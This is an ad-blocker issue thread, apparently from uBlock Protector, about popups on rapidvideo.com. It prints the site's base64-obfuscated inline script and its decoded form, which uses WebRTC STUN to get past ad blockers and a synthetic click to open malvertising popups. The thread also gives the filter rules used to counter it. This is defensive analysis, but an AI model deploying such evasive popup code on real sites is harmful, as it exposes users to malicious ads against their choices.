rapidvideo.com

[ale5000-git]

It open a popup with ads.

Test link: This cannot be sent publicly.
Please tell me another way to send it.

The popup appears only when you hit the play button.

I have fixed it with this:
||35.184.169.188^$popup
it would be nice if it is included (this or a more generic one if you find it).

[jspenguin2017]

Popup cannot be reproduced on the home page, I need a test link to implement a fix.

You can either open an issue in our restricted issues tracker (don't forget to flag it as confidential), or submit a message to https://jspenguin.com/PrivateMessage with reference 246.

Update: Message received, it is posted to GitLab so it won't be lost. I am the only one who can see that issue. https://gitlab.com/xuhaiyang1234/uBlockProtectorSecretIssues/issues/3

[ale5000-git]

I have sent a private message, you just need to open the link and hit play to see the popup.

[jspenguin2017]

Thanks, I received it. I'll have a look.

[jspenguin2017]

The popup is probably somewhere here, I'm not sure how long that rule can last as changing IP is rather trivial...

Update: after some tests, it can be narrowed down to inline script.

[jspenguin2017]

Found the code that is responsible for it... It uses WebRTC to retrieve data to bypass ad blockers... Well, let's just remove window.atob so it can't decode the payload 😆

(function(){if (window.atob) { eval(window.atob('d2luZG93LkNTU1ZpZXdwb3J0UnVsZXMgPSB0cnVlOyhmdW5jdGlvbihkb2N1bWVudCwgc2NyaXB0RWxlbWVudCwgZmlyc3RTY3JpcHQpIHtzY3JpcHRFbGVtZW50ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7c2NyaXB0Q0ZBU3luYyA9IGRvY3VtZW50LmNyZWF0ZUF0dHJpYnV0ZSgiZGF0YS1jZmFzeW5jIik7c2NyaXB0Q0ZBU3luYy52YWx1ZSA9IGZhbHNlO3NjcmlwdEVsZW1lbnQuc2V0QXR0cmlidXRlTm9kZShzY3JpcHRDRkFTeW5jKTtzY3JpcHRFbGVtZW50LnNyYyA9ICcvL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9qcy9hZHNieWdvb2dsZS5qcyc7c2NyaXB0RWxlbWVudC5vbmVycm9yID0gZnVuY3Rpb24gKCkgeyB3aW5kb3cuQ1NTVmlld3BvcnRSdWxlcz1mYWxzZTsgfTsgdmFyIGZpcnN0U2NyaXB0O2lmICh0eXBlb2YgZG9jdW1lbnQuc2NyaXB0cyAhPT0gJ3VuZGVmaW5lZCcpIHsgZmlyc3RTY3JpcHQgPSBkb2N1bWVudC5zY3JpcHRzWzBdOyB9IGlmICh0eXBlb2YgZmlyc3RTY3JpcHQgPT0gJ3VuZGVmaW5lZCcpIHsgZmlyc3RTY3JpcHQgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc2NyaXB0JylbMF07IH0gZmlyc3RTY3JpcHQucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoc2NyaXB0RWxlbWVudCwgZmlyc3RTY3JpcHQpOyB9KGRvY3VtZW50KSk7CihmdW5jdGlvbigpeyB2YXIgd2FzX2luaXQgPSBmYWxzZTsgZnVuY3Rpb24gaW5pdF9teXNjcmlwdCgpIHsgaWYgKHdhc19pbml0KSByZXR1cm4gOyB3YXNfaW5pdCA9IHRydWU7IHZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImRpdiIpO2MuaW5uZXJIVE1MPSImbmJzcDsiO2MuY2xhc3NOYW1lPSJhZHNib3giO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYyk7d2luZG93LnNldFRpbWVvdXQoZnVuY3Rpb24oKXtpZigwPT09Yy5vZmZzZXRIZWlnaHR8fHdpbmRvdy5DU1NWaWV3cG9ydFJ1bGVzPT09ZmFsc2Upe3ZhciBsPTAsZD1uZXcgKHdpbmRvdy5SVENQZWVyQ29ubmVjdGlvbnx8d2luZG93Lm1velJUQ1BlZXJDb25uZWN0aW9ufHx3aW5kb3cud2Via2l0UlRDUGVlckNvbm5lY3Rpb24pKHtpY2VTZXJ2ZXJzOlt7dXJsOiJzdHVuOjE3NTUwMDE4MjY6NDQzIn1dfSx7b3B0aW9uYWw6W3tSdHBEYXRhQ2hhbm5lbHM6ITB9XX0pO2Qub25pY2VjYW5kaWRhdGU9ZnVuY3Rpb24oYil7dmFyIGU9IiI7IWIuY2FuZGlkYXRlfHwoYi5jYW5kaWRhdGUgJiYgYi5jYW5kaWRhdGUuY2FuZGlkYXRlLmluZGV4T2YoJ3NyZmx4JykgPT0gLTEpfHwhKGI9LyhbMC05XXsxLDN9KFwuWzAtOV17MSwzfSl7M318W2EtZjAtOV17MSw0fSg6W2EtZjAtOV17MSw0fSl7N30pLy5leGVjKGIuY2FuZGlkYXRlLmNhbmRpZGF0ZSlbMV0pfHwKbXx8Yi5tYXRjaCgvXigxOTJcLjE2OFwufDE2OVwuMjU0XC58MTBcLnwxNzJcLigxWzYtOV18MlxkfDNbMDFdKSkvKXx8Yi5tYXRjaCgvXlthLWYwLTldezEsNH0oOlthLWYwLTldezEsNH0pezd9JC8pfHwobT0hMCxlPWIsZG9jdW1lbnQub25jbGljaz1mdW5jdGlvbigpe2N1cnJlbnRfY291bnQ9cGFyc2VJbnQoKGRvY3VtZW50LmNvb2tpZS5tYXRjaCgibm9wcnBobGJmbWR3dGdpc3pjbnQ9KFteO10uKz8pKDt8JCkiKXx8W10pWzFdfHwwKTtpZighbCYmMjE0NzQ4MzY0Nj5jdXJyZW50X2NvdW50KXtsPTE7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiYSIpLGI9TWF0aC5mbG9vcigxRTEyKk1hdGgucmFuZG9tKCkpLGY9TWF0aC5yYW5kb20oKS50b1N0cmluZygzNikucmVwbGFjZSgvW15hLXpBLVowLTldKy9nLCIiKS5zdWJzdHIoMCwxMCk7YS5ocmVmPSJodHRwOi8vIitlKyIvIituLmVuY29kZShiKyIvIisoMTU1NzAxNytiKSsiLyIrZik7YS50YXJnZXQ9Il9ibGFuayI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsKYj1uZXcgTW91c2VFdmVudCgiY2xpY2siLHt2aWV3OndpbmRvdyxidWJibGVzOiExLGNhbmNlbGFibGU6ITF9KTthLmRpc3BhdGNoRXZlbnQoYik7YS5wYXJlbnROb2RlLnJlbW92ZUNoaWxkKGEpO2E9bmV3IERhdGU7YS5zZXRUaW1lKGEuZ2V0VGltZSgpKzg2NDAwMDAwKTtiX2RhdGU9KGV4aXN0aW5nX2RhdGU9dW5lc2NhcGUoKGRvY3VtZW50LmNvb2tpZS5tYXRjaCgibm9wcnBobGJmbWR3dGdpc3pleHA9KFteO10uKz8pKDt8JCkiKXx8W10pWzFdfHwiIikpP2V4aXN0aW5nX2RhdGU6YS50b0dNVFN0cmluZygpO2E9IjsgZXhwaXJlcz0iK2JfZGF0ZTtkb2N1bWVudC5jb29raWU9Im5vcHJwaGxiZm1kd3RnaXN6Y250PSIrKGN1cnJlbnRfY291bnQrMSkrYSsiOyBwYXRoPS8iO2RvY3VtZW50LmNvb2tpZT0ibm9wcnBobGJmbWR3dGdpc3pleHA9IitiX2RhdGUrYSsiOyBwYXRoPS8ifX0pfTtkLmNyZWF0ZURhdGFDaGFubmVsKCIiKTtkLmNyZWF0ZU9mZmVyKGZ1bmN0aW9uKGIpe2Quc2V0TG9jYWxEZXNjcmlwdGlvbihiLGZ1bmN0aW9uKCl7fSxmdW5jdGlvbigpe30pfSwKZnVuY3Rpb24oKXt9KX1NYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5yZXBsYWNlKC9bXmEtekEtWjAtOV0rL2csIiIpLnN1YnN0cigwLDEwKTt2YXIgbT0hMSxuPXtfMDoiQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLz0iLGVuY29kZTpmdW5jdGlvbihiKXtmb3IodmFyIGU9IiIsYSxjLGYsZCxrLGcsaD0wO2g8Yi5sZW5ndGg7KWE9Yi5jaGFyQ29kZUF0KGgrKyksYz1iLmNoYXJDb2RlQXQoaCsrKSxmPWIuY2hhckNvZGVBdChoKyspLGQ9YT4+MixhPShhJjMpPDw0fGM+PjQsaz0oYyYxNSk8PDJ8Zj4+NixnPWYmNjMsaXNOYU4oYyk/az1nPTY0OmlzTmFOKGYpJiYoZz02NCksZT1lK3RoaXMuXzAuY2hhckF0KGQpK3RoaXMuXzAuY2hhckF0KGEpK3RoaXMuXzAuY2hhckF0KGspK3RoaXMuXzAuY2hhckF0KGcpO3JldHVybiBlfX19LDQwMCkgfSBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgZnVuY3Rpb24gKCkgeyBpbml0X215c2NyaXB0KCk7IH0gKTsgd2luZG93LnNldFRpbWVvdXQoaW5pdF9teXNjcmlwdCwgMTIwKSB9KSgpOw==')) } })();

[jspenguin2017]

The decoded payload:

window.CSSViewportRules = true;
(function(document, scriptElement, firstScript) {
    scriptElement = document.createElement('script');
    scriptCFASync = document.createAttribute("data-cfasync");
    scriptCFASync.value = false;
    scriptElement.setAttributeNode(scriptCFASync);
    scriptElement.src = '//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js';
    scriptElement.onerror = function() {
        window.CSSViewportRules = false;
    };
    var firstScript;
    if (typeof document.scripts !== 'undefined') {
        firstScript = document.scripts[0];
    }
    if (typeof firstScript == 'undefined') {
        firstScript = document.getElementsByTagName('script')[0];
    }
    firstScript.parentNode.insertBefore(scriptElement, firstScript);
}(document));
(function() {
    var was_init = false;

    function init_myscript() {
        if (was_init) return;
        was_init = true;
        var c = document.createElement("div");
        c.innerHTML = " ";
        c.className = "adsbox";
        document.body.appendChild(c);
        window.setTimeout(function() {
            if (0 === c.offsetHeight || window.CSSViewportRules === false) {
                var l = 0,
                    d = new(window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)({
                        iceServers: [{
                            url: "stun:1755001826:443"
                        }]
                    }, {
                        optional: [{
                            RtpDataChannels: !0
                        }]
                    });
                d.onicecandidate = function(b) {
                    var e = "";
                    !b.candidate || (b.candidate && b.candidate.candidate.indexOf('srflx') == -1) || !(b = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(b.candidate.candidate)[1]) ||
                        m || b.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/) || b.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/) || (m = !0, e = b, document.onclick = function() {
                            current_count = parseInt((document.cookie.match("noprphlbfmdwtgiszcnt=([^;].+?)(;|$)") || [])[1] || 0);
                            if (!l && 2147483646 > current_count) {
                                l = 1;
                                var a = document.createElement("a"),
                                    b = Math.floor(1E12 * Math.random()),
                                    f = Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
                                a.href = "http://" + e + "/" + n.encode(b + "/" + (1557017 + b) + "/" + f);
                                a.target = "_blank";
                                document.body.appendChild(a);
                                b = new MouseEvent("click", {
                                    view: window,
                                    bubbles: !1,
                                    cancelable: !1
                                });
                                a.dispatchEvent(b);
                                a.parentNode.removeChild(a);
                                a = new Date;
                                a.setTime(a.getTime() + 86400000);
                                b_date = (existing_date = unescape((document.cookie.match("noprphlbfmdwtgiszexp=([^;].+?)(;|$)") || [])[1] || "")) ? existing_date : a.toGMTString();
                                a = "; expires=" + b_date;
                                document.cookie = "noprphlbfmdwtgiszcnt=" + (current_count + 1) + a + "; path=/";
                                document.cookie = "noprphlbfmdwtgiszexp=" + b_date + a + "; path=/"
                            }
                        })
                };
                d.createDataChannel("");
                d.createOffer(function(b) {
                        d.setLocalDescription(b, function() {}, function() {})
                    },
                    function() {})
            }
            Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
            var m = !1,
                n = {
                    _0: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
                    encode: function(b) {
                        for (var e = "", a, c, f, d, k, g, h = 0; h < b.length;) a = b.charCodeAt(h++), c = b.charCodeAt(h++), f = b.charCodeAt(h++), d = a >> 2, a = (a & 3) << 4 | c >> 4, k = (c & 15) << 2 | f >> 6, g = f & 63, isNaN(c) ? k = g = 64 : isNaN(f) && (g = 64), e = e + this._0.charAt(d) + this._0.charAt(a) + this._0.charAt(k) + this._0.charAt(g);
                        return e
                    }
                }
        }, 400)
    }
    document.addEventListener("DOMContentLoaded", function() {
        init_myscript();
    });
    window.setTimeout(init_myscript, 120)
})();

[ale5000-git]

Thanks.

[uBlock-user]

Killing eval should patch it too.

[jspenguin2017]

Yea, there are many things we can do.

Pretty nasty code, goes right through uBO and retrieve malvertizing popup link. Also use MouseEvent to make the popup being treated as a link click.

[uBlock-user]

Yes, these days they're making the popups appear as hyper-links.

[uBlock-user]

Test link for any further investigation - https://www.rapidvideo.com/embed/FEXYFN0CJO

[jspenguin2017]

Chromium should tell extension if MouseEvent is used, so extensions can know if the popup is a real click or it's a real click but could be baited.

Oh, good, I also have another link recorded privately so they can't just revoke the link.

[uBlock-user]

It should be passed through WebRequest API otherwise uBO or any such extension will never know. WebRTC still doesn't pass through WebRequest API and goes undetected as of Chromium 60.

[jspenguin2017]

As far as I know, WebRTC uses a special binary plugin, and requests do not go through WebRequest, the log is available at chrome://webrtc-internals/ so I guess Chromium can make a RCTRequest or something... The URL is very different, in this case, the server is stun:1755001826:443 so I guess it's not appropriate to put it together with WebRequest.

I think uBO has a workaround that patches RTCPeerConnection, but I think the patching is not done everywhere by default.

[jspenguin2017]

I still need to read over uBO and VM source code... I guess I need to know how uBO and VM works to properly manage this project. Chrome is properly documented so that's fine.

[uBlock-user]

Actually it's supposed to go there as it's making a network connection behind-the-scene - w3c/webappsec-csp#92

[uBlock-user]

uBO's workaround has already been worked-around by numerous websites so it's no longer used. Right now uBO-Extra is being used to kill it with $websocket

[jspenguin2017]

You can just nuke those two properties from window on a per domain basis. It's not hard to completely kill it.

[uBlock-user]

Yeah ofcourse if they're using any such window properties, then that works.

[jspenguin2017]

Huh, you mean they grab another window from iframe? Hum...

[ale5000-git]

@jspenguin2017: On my link it is fixed but on the link provided by @uBlock-user if you reload the page sometimes, there is one time where the ads/malware bypass the block.

[jspenguin2017]

@ale5000-git OK, I see, race condition... Time to bring in noeval.js.

[jspenguin2017]

How come uBlock Origin can win the race... when uBlock Protector runs, it should be synchronous and blocks further parsing until it is ready...
I guess I have to read VM code to find out... Maybe it's asynchronous...

[jspenguin2017]

This should patch it for good.

[ale5000-git]

Unfortunately sometimes it is still able to open a popup.
With the latest version is it even more frequent.

[jspenguin2017]

Maybe it's still using cache, can you try to manually add this rule to uBlock Origin?
rapidvideo.com##script:inject(noeval.js)

I'm not getting popups anymore.

[ale5000-git]

Sorry, it is as you said.
Put it manually fixed it.

Then I have removed the manual rule, cleaned uBlock cache and browser cache and the problem is still fixed.

[jspenguin2017]

Test: https://www.rapidvideo.com/e/FFOTMRAVLC

More test: https://gitlab.com/xuhaiyang1234/NanoAdblockerSecretIssues/issues/19